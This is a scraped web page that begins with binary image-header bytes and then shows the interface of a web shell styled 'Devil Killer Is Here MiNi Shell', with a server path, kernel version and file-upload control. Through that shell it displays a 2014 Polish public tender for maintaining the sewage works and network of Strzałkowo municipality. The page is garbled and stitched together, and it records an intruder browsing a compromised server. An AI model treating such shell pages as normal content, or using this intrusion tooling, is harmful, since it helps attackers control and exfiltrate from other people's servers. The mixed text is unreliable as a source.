JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140618/207384-N-2014.html

<p class="kh_header"><b>Strzałkowo: Eksploatacja i konserwacja oczyszczalni ścieków, sieci i urządzeń kanalizacji sanitarnej gminy Strzałkowo w ramach świadczenia usług w zakresie zbiorowego odprowadzania ścieków na dzierżawionym od gminy Strzałkowo majątku</b><br>
<b>Numer ogłoszenia: 207384 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Strzałkowo , Al. Prymasa Wyszyńskiego 6, 62-420 Strzałkowo, woj. wielkopolskie, tel. 0-63 275 06 19, faks 0-63 275 02 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Eksploatacja i konserwacja oczyszczalni ścieków, sieci i urządzeń kanalizacji sanitarnej gminy Strzałkowo w ramach świadczenia usług w zakresie zbiorowego odprowadzania ścieków na dzierżawionym od gminy Strzałkowo majątku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest eksploatacja i konserwacja oczyszczalni ścieków, sieci i urządzeń kanalizacji sanitarnej gminy Strzałkowo w ramach świadczenia usług w zakresie zbiorowego odprowadzania i oczyszczania ścieków na dzierżawionym od gminy Strzałkowo majątku, a w szczególności:
2.1 W zakresie oczyszczalni ścieków:
1)prowadzenie eksploatacji oczyszczalni ścieków zgodnie z instrukcją obsługi oczyszczalni;
2)wykonywanie analiz ścieków surowych i oczyszczonych na oczyszczalni ścieków według potrzeb (zgodnie z obowiązującymi przepisami);
3)realizacja obowiązków wynikających z aktualnych pozwoleń wodnoprawnych, obowiązkowych przepisów i innych decyzji;
4)mierzenie i rejestrowanie ilości odprowadzanych ścieków;
5)wykonywanie analiz osadu czynnego na oczyszczalni ścieków zgodnie z obowiązującymi przepisami; 
6)wykonywanie badań laboratoryjnych jakości odprowadzanych ścieków zgodnie z pozwoleniem wodnoprawnym i obowiązującymi przepisami; 
7)zapewnienie jakości ścieków oczyszczonych, zgodnie z pozwoleniem wodnoprawnym;
8)likwidacja przyczyn i skutków odchyleń ścieków od obowiązujących norm;
9)przekazywanie osadu, piasku i skratek zgodnie z ustawą o odpadach
10)obsługa punktu zlewnego z kontrolą dowożonych ścieków i pobierania opłat według ustalonych stawek przez Radę Gminy;
11)dokonywanie przeglądów, napraw, remontów, usuwania uszkodzeń, konserwacji urządzeń i budowli;
12)utrzymywanie porządku i czystości na terenie oczyszczalni ścieków w tym dbanie o stan ogrodzenia, wykaszanie trawy i zakrzaczeń;
13)prowadzenie książek eksploatacji urządzeń w oczyszczalni ścieków i w budowlach, zawierających wykaz wykonanych prac oraz założenia i prowadzenia książek obiektów budowlanych zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie książki obiektu budowlanego ( Dz. U. Nr 120, poz. 1134) dla wszystkich dzierżawionych obiektów, 
14)utrzymanie i konserwacja rowów odprowadzających oczyszczone ścieki zgodnie z pozwoleniem wodnoprawnym;
15)ponoszenie pełnej odpowiedzialności za przejętą oczyszczalnię wraz z towarzyszącą infrastrukturą i jej eksploatację.
2.2 W zakresie kanalizacji sanitarnej wraz z tłoczniami i przepompowniami:
1)utrzymanie urządzeń kanalizacyjnych, tłoczni i przepompowni w stanie technicznym zapewniającym stały odbiór i oczyszczanie ścieków do parametrów bezpiecznych dla środowiska i zgodnych z aktualnym pozwoleniem wodnoprawnym;
2)zapewnienie urządzeniom kanalizacyjnym prawidłowej pracy i eksploatacji - dokonywanie przeglądów, napraw, remontów bieżących i usuwanie awarii niezbędnych do utrzymania kanalizacji sanitarnej w stanie niepogorszonym (w tym konserwacja , eksploatacja, remont i naprawa obiektów budowlanych) na własny koszt;
3)systematyczne czyszczenie sieci przy użyciu samochodu specjalnego ssąco płuczącego do ciśnieniowego udrażniania kanalizacji
4)całodobowe i bezawaryjne odprowadzanie ścieków od dostawców indywidualnych i zbiorczych zgodnie z obowiązującymi przepisami i pozwoleniami;
5)prowadzenie prac obsługi codziennej przez osoby o odpowiednich kwalifikacjach zawodowych i uprawnieniach;
6)odczytywanie stanów przepływomierzy lub wodomierzy w tym prowadzenie ich ewidencji;
7)kontrolowanie jakości ścieków odprowadzanych z zakładów przemysłowych do gminnej sieci kanalizacyjnej;
8)likwidacja przyczyn i skutków odchyleń ścieków od obowiązujących norm;
9)nieodpłatne czyszczenie kanalizacji sanitarnej samochodem WUKO w miejscach wskazanych przez Zamawiającego;
10)odcinanie przyłączy za nieterminowe płacenie należności oraz lokalizacja nieprawidłowo wykonanych  przyłączy kanalizacyjnych i punktów nielegalnego spustu ścieków, prowadzenie odpowiedniego postępowania w tych sprawach, łącznie z odcinaniem nielegalnych przyłączy;
11)przeprowadzenie systematycznych raz na kwartał kontroli przyłączy kanalizacji sanitarnej. Sprawozdanie z dokonanych czynności kontrolnych Wykonawca przedkłada Zamawiającemu w terminie 14 dni od zakończenia czynności kontrolnych;
12)prowadzenie przeglądów dzierżawionych urządzeń w obecności przedstawiciela Zamawiającego, właściciela gruntu (użytkownika);
13)sprawowanie nadzoru technicznego nad eksploatacją dzierżawionych urządzeń i ich elementami poprzez bieżące, pisemne zgłaszanie Zamawiającemu każdej awarii w infrastrukturze kanalizacyjnej, (przepompowni, tłoczni, sieci, przyłączy), prowadzenie dziennika usuwanych awarii, zawierającego miejsce wystąpienia, czas usuwania i opis awarii rozliczenie wg. stawek oferty;
14)wyznaczenie osoby i siedziby, w której należy zgłaszać awarię urządzeń kanalizacyjnych;
15)usuwanie wszelkich awarii i usterek technicznych urządzeń kanalizacyjnych i budowli nie objętych gwarancją w przeciągu 12 godzin od chwili ich wystąpienia, a w przypadku objętych gwarancją winien niezwłocznie zwrócić się do gwaranta o usunięcie awarii zgodnie z warunkami gwarancji;
16)utrzymanie pogotowia technicznego, do którego zadań będzie należało lokalizowanie 
i ograniczanie skutków awarii oraz usunięcie jej najpóźniej w ciągu 12 godzin. Przystąpienie do zabezpieczenia awarii następuje z chwilą otrzymania zgłoszenia;
17)wydawanie warunków technicznych dotyczących budowy urządzeń kanalizacyjnych 
w tym przyłączy kanalizacyjnych;
18)prowadzenie nadzoru technicznego nad realizacją wydanych warunków technicznych, w tym odbiór wybudowanych przyłączy i kanalizacyjnych;
a)opiniowanie i uzgadnianie opracowań projektowych;
b)nadzór techniczny nad remontami urządzeń kanalizacyjnych wykonanymi przez inne jednostki na wniosek właściciela urządzeń;
c)udział w odbiorach robót zanikowych, końcowych i gwarancyjnych;
19)zawieranie umów na odprowadzanie ścieków z właścicielami nieruchomości, fakturowanie, pobieranie i rozliczanie opłat za odebrane ścieki oraz dostarczanie odbiorcom faktur; Przedsiębiorca zobowiązany jest niezwłocznie podpisać umowy z dotychczasowymi odbiorcami usług w terminie miesiąca od daty podpisania niniejszej umowy;
20)prowadzenie ewidencji odbiorców indywidualnych i grupowych oraz udostępnianie bazy danych Zamawiającemu (w terminie 7 dni po upływie każdego kwartału);
21)prowadzenie ewidencji ilościowo-wartościowej sprzedaży;
22)przyjmowanie zgłoszeń dotyczących wymiany oraz zamontowania nowych przepływomierzy, przyłączy;
23)utrzymywanie porządku i czystości na terenie tłoczni i przepompowni w tym dbanie o stan ogrodzenia, wykaszanie trawy i zakrzaczeń;

2.3Inne:
1) ponoszenie wszelkich kosztów i świadczeń związanych z eksploatacją przedmiotu umowy, w tym obciążeń z tytułu:
a)zobowiązań publiczno-prawnych np. podatku od nieruchomości dzierżawionych budynków i budowli (w dniu zawierania umowy na mocy uchwały Nr XXVIII/247/2013 Rady Gminy Strzałkowo z dnia 7 listopada 2013r. w sprawie zwolnień w podatku od nieruchomości; budynki lub ich części oraz budowle służące do zbiorowego odprowadzania i oczyszczania ścieków są zwolnione z tego podatku);  
b)kosztów opłat za korzystanie ze środowiska;
c)zużycia wody;
d)zużycia energii elektrycznej;
e)połączeń telefonicznych i monitoringu;
f)wywozu nieczystości, osadów, popłuczyn i innych odpadów płynnych i stałych;
g)opłat za badanie ścieków;
h)opłat za korzystanie ze środowiska;
i)opłat za dozór techniczny;
j)ubezpieczenia przedmiotu umowy od wszelkich ryzyk przez cały okres dzierżawy, w tym ubezpieczenie budynków i ich wyposażenia oraz ruchomości od ognia i innych zdarzeń losowych, kradzieży z włamaniem i rabunku i okazanie na żądanie Zamawiającego polisy stanowiącej dowód zawarcia umowy ubezpieczenia;
k)ponoszenie kosztów napraw awarii i remontów oraz innych zgodnie z § 3 
l)opłaty czynszu dzierżawnego za przedmiot umowy .
2)prowadzenie pełnej ewidencji księgowej związanej z przedmiotem zamówienia zgodnie z przepisami ustawy o zbiorowym zaopatrzeniu w wodę i odprowadzeniu ścieków i ustawy o rachunkowości niezbędnej dokumentacji księgowej;
3)zabezpieczenie przedmiotu dzierżawy zgodnie z wymogami ochrony przeciwpożarowej, Państwowej Inspekcji Pracy, Państwowej Inspekcji Sanitarnej, Inspekcji Ochrony Środowiska, Nadzoru Budowlanego itp. oraz wykonywanie zaleceń tych organów na własny koszt;
4)ponoszenie wszelkiej odpowiedzialności odszkodowawczej za szkody związane z jego działalnością w związku z wykonywanymi usługami w zakresie zbiorowego odprowadzania ścieków na terenie gminy Strzałkowo;
5)zgłaszanie Zamawiającemu jako zarządcy dróg gminnych, każdorazowego wejścia w teren pasa drogowego drogi gminnej związanego z usuwaniem awarii;
6)wejście w teren pasa drogowego związane z usuwaniem awarii może nastąpić tylko przy spełnieniu wszystkich niżej określonych warunków:
a)niezwłoczne telefoniczne zgłoszenie awarii do zarządcy drogi z podaniem lokalizacji zakresu utrudnień drogowych oraz przewidywanego czasu zakończenia robót;
b)złożenie wniosku o zajęcia pasa drogowego (w terminie nie później niż trzeciego dnia roboczego po wystąpieniu awarii) zgodnie z ogólnymi zasadami;
c)z czynności odbioru odtworzonego pasa drogowego sporządzony zostanie protokół;
d)zajmujący pas drogowy udziela 12 miesięcznej gwarancji na wykonane przez siebie roboty związane z odtworzeniem pasa drogowego;
7)udostępnienie biura obsługi klienta na terenie miejscowości Strzałkowo czynnego co najmniej pięć dni w tygodniu w godz. od 8°° do 15°°, w terminie 14 dni od zawarcia  niniejszej umowy, prowadzenie na bieżąco strony internetowej, przyjmowanie i załatwianie zgłoszeń telefonicznych wszystkich reklamacji związanych z odprowadzaniem ścieków, we wszystkie dni roku (także w niedziele i święta) przez 24 godziny na dobę;
8)przeprowadzanie inwentaryzacji składników dzierżawionego majątku zgodnie z przepisami ustawy o rachunkowości oraz przekazywanie wyników inwentaryzacji Zamawiającemu;   
9)składanie Zamawiającemu co miesiąc sprawozdania dotyczącego ilości odebranych ścieków oraz wielkości zebranych należności;
10)składanie okresowych raportów Zamawiającemu (nie rzadziej niż co 12 miesięcy) w terminie do 30 września każdego roku o inwestycjach koniecznych do przeprowadzenia w zakresie oczyszczalni, sieci kanalizacyjnych i urządzeń kanalizacyjnych, w wyniku których powstaną nowe środki  trwałe wchodzące w skład tej sieci oraz w zakresie planowanych modernizacji, przebudowy;
11)egzekucja należności od odbiorców nieregulujących opłat za świadczenie usług  w zakresie odprowadzania ścieków;
12)powiadamianie dostawców ścieków oraz Urząd Gminy Strzałkowo, osobiście lub  przez obwieszczenie na tablicy ogłoszeń o konieczności wstrzymania odbioru ścieków wskazując termin, do którego ma on nastąpić oraz powód wstrzymywania;
13)umożliwienie wstępu przedstawicielowi zamawiającego na teren obiektów celem  dokonania kontroli lub innych czynności związanych z eksploatacją obiektów;
14)realizacja obowiązków wynikających z aktualnych pozwoleń wodnoprawnych, w tym sprawozdawczość oraz inne obowiązki wynikające z ustawy z dnia 7 czerwca 2001 r. o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków, regulaminu zbiorowego dostarczania wody i zbiorowego odprowadzania ścieków w Gminie Strzałkowo i innych aktów prawnych.
3.Udostępnienie oczyszczalni ścieków, sieci i urządzeń kanalizacji sanitarnej następuje w formie dzierżawy od której będzie pobierany miesięczny czynsz dzierżawny składający się z:
1) części stałej- w kwocie 2600,00zł + VAT,
2) części zmiennej - w wysokości 1/12 wartości odtworzeniowej dzierżawionego majątku + podatek Vat według obowiązujących stawek. Wysokość wartości odtworzeniowej na dzień ogłoszenia przetargu wynosi 300 212,00zł i ulega zmianie o wartość wybudowanych lub zlikwidowanych urządzeń i sieci (ta część czynszu nie może być ujęta przy ustalaniu stawki taryfy ceny ścieków).
4. Przedmiot zamówienia będzie wykonywany przez Przedsiębiorcę za wynagrodzeniem, które stanowią pożytki z tytułu wnoszenia opłat za odprowadzanie ścieków. 
Przedsiębiorca zgodnie z obowiązująca do dnia 31 grudnia 2014r. taryfą z tytułu eksploatacji i konserwacji kanalizacji sanitarnej, odbioru ścieków będzie pobierał należności od dostawców ścieków w wysokości:
a) ścieki bytowe odprowadzane systemem sieci kanalizacyjnej   -w cenie 4,04 zł/m3 + VAT;
b) ścieki bytowe dowożone za pomocą wozów ascenizacyjnych -w cenie 4,04 zł/m3 + VAT;
c) ścieki przemysłowe  w cenie 7,38 zł/m3 + VAT.
Zmiana taryf następować będzie zgodnie z przepisami ustawy z 7 czerwca 2001r. o zbiorowym zaopatrzeniu w wodę i odprowadzaniu ścieków (Dz. U. z 2006r. Nr 123, poz. 858 ze zm.) z uwzględnieniem cen i wskaźników określonych w ofercie Wykonawcy.
5. Szczegółowy opis przedmiotu zamówienia określa umowa stanowiąca załącznik nr 8 do SIWZ. 
Wykaz ilościowy przedmiotu umowy stanowi załącznik nr 9 do SIWZ.
Ilość odprowadzonych ścieków w roku 2013 wyniosła ~ 210 000m3.
Z inwentaryzacją geodezyjną można zapoznać się w urzędzie gminy w pok. nr 17, w godzinach urzędowania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-0, 90.48.00.00-5, 90.48.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 15 000,00 zł słownie: piętnaście tysięcy  złotych
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)w pieniądzu, przelewem na rachunek bankowy: Ludowy Bank Spółdzielczy w Strzałkowie konto nr 14 8543 0000 2001 1000 0273 0005 z dopiskiem; wadium  na Eksploatacja i konserwacja oczyszczalni ścieków, sieci i urządzeń kanalizacji sanitarnej gminy Strzałkowo.
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)w gwarancjach bankowych, 
4)w gwarancjach ubezpieczeniowych, 
5)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275. 
 Kserokopie wpłaty, kopie gwarancji lub poręczeń załączyć do oferty .
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 1 ustawy.
Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży przyrzeczenie wydania zezwolenia na prowadzenie zbiorowego odprowadzenia ścieków na terenie gminy Strzałkowo (promesy) lub zezwolenie  na prowadzenie działalności w zakresie zbiorowego odprowadzania ścieków wydanego przez właściwy organ (Wójta) zgodnie z ustawą o zbiorowym zaopatrzeniu w wodę i zbiorowego odprowadzania ścieków (t.j. Dz.U. 2006.123.858 ze zm.). Przed podpisaniem umowy wykonawca, który złożył promesę musi przedłożyć zezwolenie na prowadzenie działalności w zakresie zbiorowego odprowadzenia ścieków wydanego przez właściwy organ zgodnie z w/w ustawą.
Ocena spełniania ww. warunku udziału w postępowaniu dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 pkt 1 oraz złożona dokumentacją;
aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte 
w art. 22 ust. 1 pkt 2 ustawy oraz szczegółowe warunki udziału w postępowaniu, tj.: 
Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługę odpowiadających swoim charakterem przedmiotowi zamówienia lub usług podobnych, tj. utrzymanie urządzeń kanalizacyjnych, na łączną wartość przy obrotach rocznych min. 500 000 zł brutto, wraz z podaniem ich wartości, przedmiotu, dat i podmiotów , na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
W zakresie wykazania spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącym posiadania wiedzy i doświadczenia należy przedłożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, w oparciu o informacje zawarte w: a) oświadczeniu o spełnianiu warunków udziału w postępowaniu, b) w wykazie wykonanych usług oraz w dowodach określających, czy usługi te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy. Wykonawca musi dysponować lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego wliczając w to jako minimum:
- samochód wielofunkcyjny przeznaczony do udrażniania kanałów wodą pod wysokim ciśnieniem z wykorzystaniem różnego rodzaju głowic i dysz czyszczących, 
z możliwością jednoczesnego odsysania nieczystości do zbiornika osadu, usuwania zanieczyszczeń i osadów ze studni kanalizacyjnych;
- koparko- ładowarkę;
- samochód towarowo - osobowy (pogotowie techniczne całodobowe) - 1 szt.
- wóz asenizacyjny lub beczkowóz
- samochód skrzyniowy lub samowyładowczy;
- sonda do lokalizacji urządzeń podziemnych;
- pompa spalinowa o wydajności ok. 50m3/h - 1 szt.
- agregat prądotwórczy - 1 szt.
- sprzęt BHP w tym ratunkowy
o miernik zawartości gazów - 1 sztuka
o aparaty tlenowe ucieczkowe - 4 sztuki
o urządzenie do wydobywania poszkodowanego ze studzienki (winda z trójnogiem)
 - 1sztuka
- zestaw oświetlenia pozwalający prowadzić roboty w nocy,
- kamera z pomiarem spadków do inspekcji kanalizacji;

Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 pkt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte 
w art. 22 ust. 1 pkt 3 ustawy oraz spełniający szczegółowe warunki udziału w postępowaniu, tj.: 
a)	Wykonawca ubiegający się o udzielenie zamówienia publicznego musi dysponować min. jedną osobę /technologa/ posiadającą min. 5 letni staż pracy w zakresie technologii pracy oczyszczalni ścieków, tłoczni , przepompowni 
b)	Wykonawca ubiegający się o udzielenie zamówienia publicznego musi dysponować min. jedną osobę  posiadającą min. 5 letni staż pracy oraz wymagane uprawnienia w zakresie kierowania robotami w zakresie sieci i urządzeń kanalizacyjnych oraz dokonywania przeglądów,  
c)	Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeśli przepisy prawa nakładają obowiązek posiadania takich uprawnień. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego w oparciu o informacje zawarte w: a) oświadczeniu o spełnianiu warunków udziału w postępowaniu, b) wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, c) oświadczeniu że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

